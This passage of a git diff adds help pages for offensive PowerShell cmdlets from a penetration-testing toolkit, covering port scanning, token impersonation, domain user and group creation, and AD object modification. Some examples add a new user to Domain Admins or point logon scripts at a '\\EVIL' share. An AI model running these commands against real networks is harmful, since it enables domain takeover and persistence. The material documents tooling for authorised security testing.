+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]
+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]
+ [-quiet] [-ForceOverwrite]
+```
+
+## DESCRIPTION
+Does a simple port scan using regular sockets, based (pretty) loosely on nmap
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
+```
+
+Description
+-----------
+Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
+```
+
+Description
+-----------
+Does a portscan of "webstersprodigy.net", and writes a greppable output file
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
+```
+
+Description
+-----------
+Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats
+
+## PARAMETERS
+
+### -Hosts
+Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in
+
+```yaml
+Type: String[]
+Parameter Sets: cmdHosts
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -HostFile
+Input hosts from file rather than commandline
+
+```yaml
+Type: String
+Parameter Sets: fHosts
+Aliases: iL
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeHosts
+Exclude these comma seperated hosts
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: exclude
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Ports
+Include these comma seperated ports (can also be a range like 80-90)
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: p
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PortFile
+Input ports from a file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: iP
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TopPorts
+Include the x top ports - only goes to 1000, default is top 50
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludedPorts
+Exclude these comma seperated ports
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: xPorts
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SkipDiscovery
+Treat all hosts as online, skip host discovery
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Pn
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -PingOnly
+Ping scan only (disable port scan)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: sn
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DiscoveryPorts
+Comma separated ports used for host discovery.
+-1 is a ping
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: PS
+
+Required: False
+Position: Named
+Default value: -1,445,80,443
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+number of max threads for the thread pool (per host)
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 100
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -nHosts
+number of hosts to concurrently scan
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 25
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Timeout
+Timeout time on a connection in miliseconds before port is declared filtered
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 2000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SleepTimer
+Wait before thread checking, in miliseconds
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 500
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SyncFreq
+How often (in terms of hosts) to sync threads and flush output
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 1024
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -T
+\[0-5\] shortcut performance options.
+Default is 3.
+higher is more aggressive.
+Sets (nhosts, threads,timeout)
+ 5 {$nHosts=30; $Threads = 1000; $Timeout = 750 }
+ 4 {$nHosts=25; $Threads = 1000; $Timeout = 1200 }
+ 3 {$nHosts=20; $Threads = 100; $Timeout = 2500 }
+ 2 {$nHosts=15; $Threads = 32; $Timeout = 3000 }
+ 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -GrepOut
+Greppable output file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oG
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -XmlOut
+output XML file
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oX
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ReadableOut
+output file in 'readable' format
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oN
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AllformatsOut
+output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: oA
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -noProgressMeter
+Suppresses the progress meter
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -quiet
+supresses returned output and don't store hosts in memory - useful for very large scans
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: q
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ForceOverwrite
+Force Overwrite if output Files exist.
+Otherwise it throws exception
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: F
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://webstersprodigy.net](http://webstersprodigy.net)
+
diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md
new file mode 100755
index 0000000..348ad91
--- /dev/null
+++ b/docs/Recon/Invoke-ReverseDnsLookup.md
@@ -0,0 +1,106 @@
+# Invoke-ReverseDnsLookup
+
+## SYNOPSIS
+Perform a reverse DNS lookup scan on a range of IP addresses.
+
+PowerSploit Function: Invoke-ReverseDnsLookup
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Invoke-ReverseDnsLookup [-IpRange] <String>
+```
+
+## DESCRIPTION
+Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records.
+This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Invoke-ReverseDnsLookup 74.125.228.0/29
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses specified by the CIDR range.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses specified by the IP range specified.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
+```
+
+IP HostName
+-- --------
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.1 iad23s05-in-f1.1e100.net
+74.125.228.2 iad23s05-in-f2.1e100.net
+74.125.228.3 iad23s05-in-f3.1e100.net
+74.125.228.4 iad23s05-in-f4.1e100.net
+74.125.228.5 iad23s05-in-f5.1e100.net
+74.125.228.6 iad23s05-in-f6.1e100.net
+
+Description
+-----------
+Returns the hostnames of the IP addresses piped from another source.
+
+## PARAMETERS
+
+### -IpRange
+Specifies the IP address range.
+The range provided can be in the form of a single IP address, a low-high range, or a CIDR range.
+Comma-delimited ranges may can be provided.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com
+https://github.com/mattifestation/PowerSploit]()
+
diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md
new file mode 100755
index 0000000..4e978ac
--- /dev/null
+++ b/docs/Recon/Invoke-RevertToSelf.md
@@ -0,0 +1,56 @@
+# Invoke-RevertToSelf
+
+## SYNOPSIS
+Reverts any token impersonation.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Invoke-RevertToSelf [[-TokenHandle] <IntPtr>]
+```
+
+## DESCRIPTION
+This function uses RevertToSelf() to revert any impersonated tokens.
+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
+CloseHandle() is used to close the opened handle.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$Token = Invoke-UserImpersonation -Credential $Cred
+Invoke-RevertToSelf -TokenHandle $Token
+
+## PARAMETERS
+
+### -TokenHandle
+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
+
+```yaml
+Type: IntPtr
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md
new file mode 100755
index 0000000..6b1afc4
--- /dev/null
+++ b/docs/Recon/Invoke-UserImpersonation.md
@@ -0,0 +1,100 @@
+# Invoke-UserImpersonation
+
+## SYNOPSIS
+Creates a new "runas /netonly" type logon and impersonates the token.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### Credential (Default)
+```
+Invoke-UserImpersonation -Credential <PSCredential> [-Quiet]
+```
+
+### TokenHandle
+```
+Invoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]
+```
+
+## DESCRIPTION
+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
+to simulate "runas /netonly".
+The resulting token is then impersonated with
+ImpersonateLoggedOnUser() and the token handle is returned for later usage
+with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
+
+## PARAMETERS
+
+### -Credential
+A \[Management.Automation.PSCredential\] object with alternate credentials
+to impersonate in the current thread space.
+
+```yaml
+Type: PSCredential
+Parameter Sets: Credential
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TokenHandle
+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
+is executed.
+
+```yaml
+Type: IntPtr
+Parameter Sets: TokenHandle
+Aliases:
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Quiet
+Suppress any warnings about STA vs MTA.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### IntPtr
+
+The TokenHandle result from LogonUser.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md
new file mode 100755
index 0000000..fc5cac0
--- /dev/null
+++ b/docs/Recon/New-DomainGroup.md
@@ -0,0 +1,150 @@
+# New-DomainGroup
+
+## SYNOPSIS
+Creates a new domain group (assuming appropriate permissions) and returns the group object.
+
+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+New-DomainGroup [-SamAccountName] <String> [[-Name] <String>] [[-DisplayName] <String>]
+ [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.GroupPrincipal with the specified
+group properties.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'
+```
+
+Creates the 'TestGroup' group with the specified description.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred
+
+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.
+
+## PARAMETERS
+
+### -SamAccountName
+Specifies the Security Account Manager (SAM) account name of the group to create.
+Maximum of 256 characters.
+Mandatory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Name
+Specifies the name of the group to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisplayName
+Specifies the display name of the group to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Description
+Specifies the description of the group to create.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.GroupPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/New-DomainUser.md b/docs/Recon/New-DomainUser.md
new file mode 100755
index 0000000..80f4fcf
--- /dev/null
+++ b/docs/Recon/New-DomainUser.md
@@ -0,0 +1,184 @@
+# New-DomainUser
+
+## SYNOPSIS
+Creates a new domain user (assuming appropriate permissions) and returns the user object.
+
+TODO: implement all properties that New-ADUser implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+New-DomainUser [-SamAccountName] <String> [-AccountPassword] <SecureString> [[-Name] <String>]
+ [[-DisplayName] <String>] [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to create a new
+DirectoryServices.AccountManagement.UserPrincipal with the specified user properties.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword
+
+Creates the 'harmj0y2' user with the specified description and password.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$user = New-DomainUser -SamAccountName harmj0y2 -Description 'This is harmj0y' -AccountPassword $UserPassword -Credential $Cred
+
+Creates the 'harmj0y2' user with the specified description and password, using the specified
+alternate credentials.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
+
+Creates the 'andy' user with the specified description and password, using the specified
+alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
+and the alternate credentials.
+
+## PARAMETERS
+
+### -SamAccountName
+Specifies the Security Account Manager (SAM) account name of the user to create.
+Maximum of 256 characters.
+Mandatory.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AccountPassword
+Specifies the password for the created user.
+Mandatory.
+
+```yaml
+Type: SecureString
+Parameter Sets: (All)
+Aliases: Password
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Name
+Specifies the name of the user to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -DisplayName
+Specifies the display name of the user to create.
+If not provided, defaults to SamAccountName.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Description
+Specifies the description of the user to create.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for user/group principals, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.UserPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
diff --git a/docs/Recon/Remove-RemoteConnection.md b/docs/Recon/Remove-RemoteConnection.md
new file mode 100755
index 0000000..fe6f3b3
--- /dev/null
+++ b/docs/Recon/Remove-RemoteConnection.md
@@ -0,0 +1,84 @@
+# Remove-RemoteConnection
+
+## SYNOPSIS
+Destroys a connection created by New-RemoteConnection.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+### ComputerName (Default)
+```
+Remove-RemoteConnection [-ComputerName] <String[]>
+```
+
+### Path
+```
+Remove-RemoteConnection [-Path] <String[]>
+```
+
+## DESCRIPTION
+This function uses WNetCancelConnection2 to destroy a connection created by
+New-RemoteConnection.
+If a -Path isn't specified, a -ComputerName is required to
+'unmount' \\\\$ComputerName\IPC$.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
+```
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the system to remove a \\\\ComputerName\IPC$ connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: ComputerName
+Aliases: HostName, dnshostname, name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remote \\\\UNC\path to remove the connection for.
+
+```yaml
+Type: String[]
+Parameter Sets: Path
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md
new file mode 100755
index 0000000..744c764
--- /dev/null
+++ b/docs/Recon/Resolve-IPAddress.md
@@ -0,0 +1,66 @@
+# Resolve-IPAddress
+
+## SYNOPSIS
+Resolves a given hostename to its associated IPv4 address.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Resolve-IPAddress [[-ComputerName] <String[]>]
+```
+
+## DESCRIPTION
+Resolves a given hostename to its associated IPv4 address using
+\[Net.Dns\]::GetHostEntry().
+If no hostname is provided, the default
+is the IP address of the localhost.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Resolve-IPAddress -ComputerName SERVER
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+@("SERVER1", "SERVER2") | Resolve-IPAddress
+```
+
+## PARAMETERS
+
+### -ComputerName
+{{Fill ComputerName Description}}
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+Accepts one or more IP address strings on the pipeline.
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+A custom PSObject with the ComputerName and IPAddress.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md
new file mode 100755
index 0000000..482d86d
--- /dev/null
+++ b/docs/Recon/Set-DomainObject.md
@@ -0,0 +1,346 @@
+# Set-DomainObject
+
+## SYNOPSIS
+Modifies a gven property for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Set-DomainObject [[-Identity] <String[]>] [-Set <Hashtable>] [-XOR <Hashtable>] [-Clear <String[]>]
+ [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Splats user/object targeting parameters to Get-DomainObject, returning the raw
+searchresult object.
+Retrieves the raw directoryentry for the object, and sets
+any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
+from -Clear @().
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose
+```
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string:
+(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y
+VERBOSE: Setting countrycode to 1234 for object harmj0y
+VERBOSE: Get-DomainSearcher search string:
+LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object testuser
+VERBOSE: Setting countrycode to 1234 for object testuser
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose
+```
+
+Cleares the 'department' field for both object identities.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+```
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+
+
+Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose
+
+VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
+VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'
+
+Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
+
+Name Value
+---- -----
+NORMAL_ACCOUNT 512
+DONT_EXPIRE_PASSWORD 65536
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+Get-DomainUser -Identity testuser -Properties scriptpath
+```
+
+scriptpath
+----------
+\\\\primary\sysvol\blah.ps1
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose
+VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain
+VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection
+VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser'
+
+Get-DomainUser -Identity testuser -Properties scriptpath
+
+scriptpath
+----------
+\\\\EVIL\program2.exe
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
